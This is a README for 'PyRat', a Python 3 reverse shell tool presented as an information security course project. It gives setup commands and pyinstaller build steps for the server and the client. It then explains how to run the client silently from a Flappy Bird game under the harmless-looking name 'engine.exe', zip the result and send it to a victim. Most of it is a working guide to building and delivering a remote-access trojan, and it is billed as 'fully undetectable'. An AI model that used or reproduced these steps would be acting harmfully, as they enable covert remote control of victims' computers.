A Simple Python 3 Reverse Shell Script
A Fully Undetectable Python 3 Reverse Shell Script
Developed by Gerard Ian M. Balaoro
In Partial Fulfillment on the Requirements for the Subject
LIS 198: Information Security
1st Semester, A.Y. 2018-2019
University of the Philippines Diliman
The author intended this to be used solely for academic purposes
Install required Python packages.
pip install -r packages.txt
Run the server script.
python server.py --port 58777
Configure server settings inside config.ini.
{"host":"127.0.0.1","port":58777}
Run client script in another computer.
Server script
pyinstaller server.py -F -y -i assets/icons/shell.ico --distpath "dist/PyRat" --name "PyRatServer"
Client script, use the windowed option to prevent the script from launching a command window
pyinstaller client.py -F -y -i assets/icons/gear.ico --distpath "dist/PyRat" --name "PyRatClient"
It’s faily easy to integrate this script to any Python application. In this example, we will use this Flappy Bird Game recreated by Sourabh Verma using the PyGame library.
All we need to do is execute the client script silently whenever the game is initialized. We also need to think of an unsuspicous name
to use when compiling the client script, in this case, we’re using ‘engine.exe’. This can be accomplished using Python’s subprocess library:
import subprocesspayload = subprocess.Popen('engine', shell = True, stdout= None, stderr = None, stdin = None)
Run pyinstaller and copy the assets folder to the destination:
pyinstaller flappy.py -F -y -i assets/icons/flappy.ico --distpath "dist/FlappyBird" --name "flappybird" --windowedxcopy "assets" "dist/FlappyBird/assets" /E /S /Y
Once done, we can now see our Trojan application inside the build/FlappyBird directory. All there’s left to do is to change the configuration settings, compress this to a zip file and send it to a victim.
.├── ...├── config.ini # Server settings├── engine.exe # Concealed payload├── flappybird.exe└── ...